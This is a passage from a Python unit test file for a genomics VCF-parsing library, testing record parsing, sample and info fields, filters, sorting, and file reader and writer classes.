self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO\\n\")\n record = VcfRecord.parse_record(input_line, [])\n self.assertEquals([], record._format_tag_fields())\n\n def test_format_field_preservesOrderWhenAddingNewTags(self):\n sample_names = [\"SA\", \"SB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F3:F1:F2|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n record.add_sample_tag_value(\"Z4\", {\"SA\" : \"SA.4\", \"SB\" : \"SB.4\"})\n record.add_sample_tag_value(\"A5\", {\"SA\" :\"SA.A5\", \"SB\" : \"SB.A5\"})\n self.assertEquals([\"F3\", \"F1\", \"F2\", \"Z4\", \"A5\"], list(record._format_tag_fields()))\n\n def test_parse_record_sample_dict(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals([\"SampleA\", \"SampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals({\"F1\":\"SA.1\", \"F2\":\"SA.2\", \"F3\":\"SA.3\"},\n record.sample_tag_values[\"SampleA\"])\n self.assertEquals({\"F1\":\"SB.1\", \"F2\":\"SB.2\", \"F3\":\"SB.3\"},\n record.sample_tag_values[\"SampleB\"])\n\n def test_sample_tag_values(self):\n sample_tag_values = VcfRecord._sample_tag_values([\"sampleA\", \"sampleB\"],\n \"foo:bar\",\n [\"SA_foo:SA_bar\", \"SB_foo:SB_bar\"])\n self.assertEquals({\"foo\":\"SA_foo\", \"bar\":\"SA_bar\"}, sample_tag_values[\"sampleA\"])\n self.assertEquals({\"foo\":\"SB_foo\", \"bar\":\"SB_bar\"}, sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_emptyDictWhenExplicitNullSampleData(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|.|.|.\\n\")\n record = VcfRecord.parse_record(input_line, sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals({}, record.sample_tag_values[\"sampleA\"])\n self.assertEquals({}, record.sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_whenSparseSampleData(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO|.|.\\n\")\n record = VcfRecord.parse_record(input_line, sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals(OrderedDict({\"FOO\":\".\"}),\n record.sample_tag_values[\"sampleA\"])\n self.assertEquals(OrderedDict({\"FOO\":\".\"}),\n record.sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_emptyDictWhenNoSampleData(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|||\\n\")\n record = VcfRecord.parse_record(input_line,\n sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals({}, record.sample_tag_values[\"sampleA\"])\n self.assertEquals({}, record.sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_emptyDictWhenNoSamples(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO\\n\")\n record = VcfRecord.parse_record(input_line, sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals({}, record.sample_tag_values)\n\n def test_parse_record_initsSampleTagValues(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals([\"SampleA\", \"SampleB\"], sorted(record.sample_tag_values.keys()))\n self.assertEquals({\"F1\":\"SA.1\", \"F2\":\"SA.2\", \"F3\":\"SA.3\"}, record.sample_tag_values[\"SampleA\"])\n self.assertEquals({\"F1\":\"SB.1\", \"F2\":\"SB.2\", \"F3\":\"SB.3\"}, record.sample_tag_values[\"SampleB\"])\n\n def test_sample_tag_values_preservesSampleOrder(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|||\\n\")\n record = VcfRecord.parse_record(input_line,\n sample_names=[\"sampleB\", \"sampleA\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n\n def test_add_sample_format_value(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n record.add_sample_tag_value(\"inserted\", {\"SampleB\":\"insertedValueB\", \"SampleA\":\"insertedValueA\"})\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3:inserted|SA.1:SA.2:SA.3:insertedValueA|SB.1:SB.2:SB.3:insertedValueB\\n\")\n self.assertEquals(expected, record.text())\n\n def test_insert_format_field_failsOnInvalidSampleDict(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertRaises(KeyError, record.add_sample_tag_value, \"inserted\", {\"SampleA\":0.6})\n self.assertRaises(KeyError, record.add_sample_tag_value, \"inserted\", {\"SampleA\":0.6, \"SampleZ\":0.6})\n self.assertRaises(KeyError, record.add_sample_tag_value, \"inserted\", {\"SampleA\":0.6, \"SampleB\":0.6, \"SampleZ\":0.6})\n\n def test_insert_format_field_failsOnExistingField(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertRaises(KeyError, record.add_sample_tag_value, \"F1\", {\"SampleA\":0.6, \"SampleB\":0.6})\n\n def test_get_info_dict_empty(self):\n vcf_record = VcfRecord(\"chr1\", \"42\", \"A\", \"C\", info=\"\")\n self.assertEquals({}, vcf_record.info_dict)\n\n def test_get_info_dict_null(self):\n vcf_record = VcfRecord(\"chr1\", \"42\", \"A\", \"C\", info=\".\")\n self.assertEquals({}, vcf_record.info_dict)\n\n def test_add_info_field_assignedField(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|k1=v1;k2=v2;baz|F|S\\n\")\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record.add_info_field(\"foo=bar\")\n self.assertEquals({\"k1\": \"v1\", \"k2\": \"v2\", \"baz\": \"baz\", \"foo\": \"bar\"}, vcf_record.info_dict)\n\n def test_add_info_field_nonAssignedField(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|k1=v1;k2=v2;baz|F|S\\n\")\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record.add_info_field(\"foo\")\n self.assertEquals({\"k1\": \"v1\", \"k2\": \"v2\", \"baz\": \"baz\", \"foo\": \"foo\"}, vcf_record.info_dict)\n\n def test_join_info_fields_nullValues(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|.|F|S\\n\")\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record._join_info_fields()\n self.assertEquals(\".\", vcf_record.info)\n\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record.add_info_field(\"foo\")\n vcf_record._join_info_fields()\n self.assertEquals(\"foo\", vcf_record.info)\n\n def test_join_info_fields_orderedCorrectly(self):\n vcf_record = VcfRecord(\"chr1\", \"2\", \"A\", \"G\", info=\"FOO;BAR;BAZ\")\n vcf_record._join_info_fields()\n self.assertEquals(\"FOO;BAR;BAZ\", vcf_record.info)\n\n def test_text(self):\n sampleA = OrderedDict(sorted({\"F1\":\"SA.1\", \"F2\":\"SA.2\", \"F3\":\"SA.3\"}.items()))\n sampleB = OrderedDict(sorted({\"F1\":\"SB.1\", \"F2\":\"SB.2\", \"F3\":\"SB.3\"}.items()))\n sample_tag_values = OrderedDict(sorted({\"SampleA\":sampleA, \"SampleB\":sampleB}.items()))\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n self.assertEquals(expected, record.text())\n\n def test_asTextWhenEmptyFormatField(self):\n sampleA = OrderedDict({})\n sampleB = OrderedDict({})\n sample_tag_values = OrderedDict({\"SampleA\":sampleA, \"SampleB\":sampleB})\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|.|.|.\\n\")\n self.assertEquals(expected, record.text())\n\n def test_asTextExpandsEmptyTrailingFormatField(self):\n sampleA = OrderedDict([('a','1'), ('b','2')])\n sampleB = OrderedDict([('a','10')])\n sample_tag_values = OrderedDict([(\"SampleA\", sampleA), (\"SampleB\", sampleB)])\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|a:b|1:2|10:.\\n\")\n self.assertEquals(expected, record.text())\n\n def test_sample_field_whenInconsistentTags(self):\n # FYI this should never happen in the wild, but I wanted to test the exception formatting.\n sampleA = OrderedDict([('a','1'), ('b','2')])\n sampleB = OrderedDict([('a','10')])\n sample_tag_values = OrderedDict([(\"SampleA\", sampleA), (\"SampleB\", sampleB)])\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n\n self.assertRaisesRegexp(ValueError,\n r'CHROM:POS:REF:ALT|sample format tags are not consistent: requested tags \\[a\\] but sample has has tags \\[a=1, b=2\\] leaving behind \\[b\\]',\n record._sample_field,\n ['a'],\n 'SampleA')\n\n\n def test_equals(self):\n sample_names = [\"sampleA\"]\n base = VcfRecord.parse_record(self.entab(\"A|1|ID|C|D|QUAL|FILTER|INFO|F|S\\n\"), sample_names)\n base_equivalent = VcfRecord.parse_record(self.entab(\"A|1|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertEquals(base, base_equivalent)\n different_chrom = VcfRecord.parse_record(self.entab(\"Z|1|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_chrom)\n different_pos = VcfRecord.parse_record(self.entab(\"A|2|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_pos)\n different_ref = VcfRecord.parse_record(self.entab(\"A|1|ID|Z|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_ref)\n different_alt = VcfRecord.parse_record(self.entab(\"A|1|ID|C|Z|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_alt)\n\n def testHash(self):\n sample_names = [\"sampleA\"]\n base = VcfRecord.parse_record(self.entab(\"A|B|ID|C|D|QUAL|FILTER|INFO|F|S\\n\"), sample_names)\n base_equivalent = VcfRecord.parse_record(self.entab(\"A|B|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertEquals(base.__hash__(), base_equivalent.__hash__())\n record_set = set()\n record_set.add(base)\n record_set.add(base_equivalent)\n self.assertEquals(1, len(record_set))\n\n def testCompare(self):\n sample_names = [\"SampleA\"]\n expected_records = [VcfRecord.parse_record(self.entab(\"1|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|1|ID|A|A|QUAL|FILTER||foo|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|1|ID|A|C|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|1|ID|C|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|2|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"2|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names)]\n\n input_records = expected_records[::-1]\n\n self.assertEquals(expected_records, sorted(input_records))\n\n def testCompare_orderingByNumericChromAndPos(self):\n sample_names = [\"SampleA\"]\n expected_records = [VcfRecord.parse_record(self.entab(\"1|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"2|1|ID|A|A|QUAL|FILTER||foo|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"10|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"11|1|ID|C|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"20|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"M|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"X|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names)]\n\n input_records = expected_records[::-1]\n\n self.assertEquals(expected_records, sorted(input_records))\n\n def testCompare_nonNumericChrom(self):\n sample_names = [\"SampleA\"]\n expected_records = [VcfRecord.parse_record(self.entab(\"chr2|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"chr5|1|ID|A|A|QUAL|FILTER||foo|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"10|1|ID|A|C|QUAL|FILTER|INFO|F|S\\n\"), sample_names)]\n\n input_records = expected_records[::-1]\n\n self.assertEquals(expected_records, sorted(input_records))\n\n def test_empty_record(self):\n sample_names = [\"SampleA\"]\n base = VcfRecord.parse_record(self.entab(\"chr2|1|ID|A|C|QUAL|FILTER|INFO|F|S\\n\"), sample_names)\n\n empty_record = base.get_empty_record()\n\n expected_record = VcfRecord(chrom=\"chr2\", pos=\"1\", ref=\"A\", alt=\"C\")\n self.assertEquals(expected_record.text(), empty_record.text())\n\n def test_add_or_replace_filter_filterReplacesPassFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"X\", \"C\", vcf_filter=\"PASS\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filterReplacesNullFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"X\", \"C\", vcf_filter=\".\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filterReplacesEmptyFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"X\", \"C\", vcf_filter=\"\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filterAppendsFailedFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"XYZ\", \"C\", vcf_filter=\"indelError\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"indelError;JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_duplicateFilterNotAdded(self):\n record = VcfRecord(\"chr1\", \"42\", \"XYZ\", \"C\", vcf_filter=\"JQ_EXCLUDE\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filtersOnlyAppendsUnique(self):\n record = VcfRecord(\"chr1\", \"42\", \"XYZ\", \"C\", vcf_filter=\"indelError\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"indelError;JQ_EXCLUDE\", record.filter)\n\n\nclass VcfReaderTestCase(test_case.JacquardBaseTestCase):\n def setUp(self):\n self.output = StringIO()\n self.saved_stderr = sys.stderr\n sys.stderr = self.output\n\n def tearDown(self):\n self.output.close()\n sys.stderr = self.saved_stderr\n\n def test_init(self):\n file_contents = [\"##metaheader1\\n\",\n \"##metaheader2\\n\",\n \"#columnHeader\\n\",\n \"record1\\n\",\n \"record2\"]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n actual_vcf_reader = VcfReader(mock_reader)\n\n self.assertEquals(\"my_dir/my_file.txt\", actual_vcf_reader.input_filepath)\n self.assertEquals(\"my_file.txt\", actual_vcf_reader.file_name)\n self.assertEquals(\"#columnHeader\", actual_vcf_reader.column_header)\n self.assertEquals([\"##metaheader1\", \"##metaheader2\"], actual_vcf_reader.metaheaders)\n self.assertEquals([], actual_vcf_reader.sample_names)\n\n def test_init_sampleNamesInitialized(self):\n file_contents = [\"##metaheader1\\n\",\n \"##metaheader2\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleA|SampleB\\n\"),\n \"record1\\n\",\n \"record2\"]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n actual_vcf_reader = VcfReader(mock_reader)\n self.assertEquals([\"SampleA\", \"SampleB\"], actual_vcf_reader.sample_names)\n\n def test_format_metaheaders(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n expected_metaheaders = {\"AF\" : '##FORMAT=',\n \"DP\" : '##FORMAT='}\n\n self.assertEquals(expected_metaheaders, reader.format_metaheaders)\n\n def test_info_metaheaders(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##INFO=\\n\",\n \"##INFO=\\n\",\n \"##INFO=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|SNP;BAR|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|BAR|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n expected_metaheaders = {\"SNP\" : \"##INFO=\",\n \"FOO\" : \"##INFO=\",\n \"BAR\" : \"##INFO=\"}\n\n self.assertEquals(expected_metaheaders, reader.info_metaheaders)\n\n def test_filter_metaheaders(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##INFO=\\n\",\n \"##FILTER=\\n\",\n \"##FILTER=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n expected_metaheaders = {\".\" : \"##FILTER=\",\n \"PASS\" : \"##FILTER=\",}\n\n self.assertEquals(expected_metaheaders, reader.filter_metaheaders)\n\n def test_format_tag_ids_ignoresRelatedFieldNames(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals(set([\"DP1\", \"DP2\", \"DP3\"]), set(reader.format_metaheaders.keys()))\n\n\n def test_format_tag_ids_idsAreUnique(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals([\"AF\"], sorted(reader.format_metaheaders.keys()))\n self.assertEquals(\"##FORMAT=\", reader.format_metaheaders[\"AF\"])\n\n def test_format_tag_ids_emptyWhenNoFormatTags(self):\n file_contents = [\"##metaheader1\\n\",\n \"##INFO=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals(0, len(reader.format_metaheaders))\n\n def test_format_tag_ids_immutable(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals([\"DP\"], sorted(reader.format_metaheaders.keys()))\n del reader.format_metaheaders[\"DP\"]\n self.assertEquals([\"DP\"], sorted(reader.format_metaheaders.keys()))\n\n def test_sort_delegatesToFileReader(self):\n _FILE_CONTENTS = [\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),]\n\n class ReversedSortMockFileReader(MockFileReader):\n def __init__(self, filename):\n MockFileReader.__init__(self, filename, _FILE_CONTENTS)\n self.filename = filename\n def __lt__(self, other):\n return self.filename > other.filename\n\n reader1 = VcfReader(ReversedSortMockFileReader(\"1.txt\"))\n reader2 = VcfReader(ReversedSortMockFileReader(\"2.txt\"))\n reader3 = VcfReader(ReversedSortMockFileReader(\"3.txt\"))\n\n actual_readers = sorted([reader1, reader2, reader3])\n\n self.assertEquals([reader3, reader2, reader1], actual_readers)\n\n def test_vcf_records(self):\n file_contents = [\"##metaheader1\\n\",\n \"##metaheader2\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n actual_vcf_records = []\n reader.open()\n for vcf_record in reader.vcf_records():\n actual_vcf_records.append(vcf_record)\n reader.close()\n\n self.assertEquals(2, len(actual_vcf_records))\n self.assertEquals('chr1', actual_vcf_records[0].chrom)\n self.assertEquals('chr2', actual_vcf_records[1].chrom)\n self.assertTrue(mock_reader.open_was_called)\n self.assertTrue(mock_reader.close_was_called)\n\n def test_vcf_records_raisesStopIterationWhenExhausted(self):\n file_contents = [\"##metaheader1\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n reader.open()\n record_iter = reader.vcf_records()\n next(record_iter)\n self.assertRaises(StopIteration,\n next,\n record_iter)\n\n def test_vcf_records_raisesTypeErrorWhenClosed(self):\n file_contents = [\"##metaheader1\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n record_iter = reader.vcf_records()\n self.assertRaises(TypeError,\n next,\n record_iter)\n\n def test_noColumnHeaders(self):\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", [\"##metaheader\\n\"])\n self.assertRaises(utils.JQException, VcfReader, mock_reader)\n\n def test_noMetaheaders(self):\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", [\"#columnHeader\\n\"])\n self.assertRaises(utils.JQException, VcfReader, mock_reader)\n\n def test_get_format_tag_list(self):\n file_contents = ['##FORMAT=\\n',\n '##FORMAT=\\n',\n '#columnHeader\\n',\n 'record1\\n',\n 'record2']\n mock_file_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n vcf_reader = VcfReader(mock_file_reader)\n actual_format_set = vcf_reader.format_metaheaders\n self.assertEquals([\"GQ\", \"GT\"], sorted(actual_format_set.keys()))\n\n def test_get_info_field_list(self):\n file_contents = ['##INFO=\\n',\n '##FORMAT=\\n',\n '##INFO=\\n',\n '#columnHeader\\n',\n 'record1\\n',\n 'record2']\n mock_file_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n vcf_reader = VcfReader(mock_file_reader)\n actual_format_set = vcf_reader.info_metaheaders\n expected_format_set = [\"AA\", \"AF\"]\n\n self.assertEquals(expected_format_set, sorted(actual_format_set.keys()))\n\nclass VcfWriterTestCase(unittest.TestCase):\n def test_write(self):\n with TempDirectory() as output_file:\n file_path = os.path.join(output_file.path, \"test.tmp\")\n\n writer = FileWriter(file_path)\n writer.open()\n writer.write(\"A\")\n writer.write(\"B\\n\")\n writer.write(\"CD\\n\")\n writer.close()\n\n actual_output = output_file.read('test.tmp', encoding='utf8')\n expected_output = \"AB|CD|\".replace('|', os.linesep)\n self.assertEquals(expected_output, actual_output)\n\nclass FileReaderTestCase(unittest.TestCase):\n def testCompare(self):\n expected_readers = [FileReader(\"1A.txt\"),\n FileReader(\"1B.txt\"),\n FileReader(\"2A.txt\"),\n FileReader(\"10A.txt\"),\n FileReader(\"10B.txt\"),\n FileReader(\"11A.txt\"),\n FileReader(\"11B.txt\"),\n FileReader(\"20A.txt\"),\n FileReader(\"100A.txt\")]\n input_readers = expected_readers[::-1]\n\n self.assertEquals(expected_readers, sorted(input_readers))\n\n def test_equality(self):\n self.assertEquals(FileReader(\"foo\"), FileReader(\"foo\"))\n self.assertNotEquals(FileReader(\"foo\"), FileReader(\"bar\"))\n self.assertNotEquals(FileReader(\"foo\"), 1)\n\n def test_hashable(self):\n s = set([FileReader(\"foo\")])\n s.add(FileReader(\"foo\"))\n self.assertEquals(1, len(s))\n\n def test_read_lines(self):\n with TempDirectory() as input_file:\n input_file.write(\"A.tmp\", b\"1\\n2\\n3\")\n reader = FileReader(os.path.join(input_file.path, \"A.tmp\"))\n reader.open()\n actual_lines = [line for line in reader.read_lines()]\n reader.close()\n\n self.assertEquals([\"1\\n\", \"2\\n\", \"3\"], actual_lines)\n\n def test_read_lines_raisesTypeErrorWhenClosed(self):\n with TempDirectory() as input_file:\n input_file.write(\"A.tmp\", b\"1\\n2\\n3\")\n reader = FileReader(os.path.join(input_file.path, \"A.tmp\"))\n line_iter = reader.read_lines()\n self.assertRaises(TypeError, next, line_iter)\n\nclass FileWriterTestCase(unittest.TestCase):\n def test_equality(self):\n self.assertEquals(FileWriter(\"foo\"), FileWriter(\"foo\"))\n self.assertNotEquals(FileWriter(\"foo\"), FileWriter(\"bar\"))\n self.assertNotEquals(FileWriter(\"foo\"), 1)\n\n def test_file_name(self):\n writer = FileWriter(\"foo/bar/baz.tmp\")\n 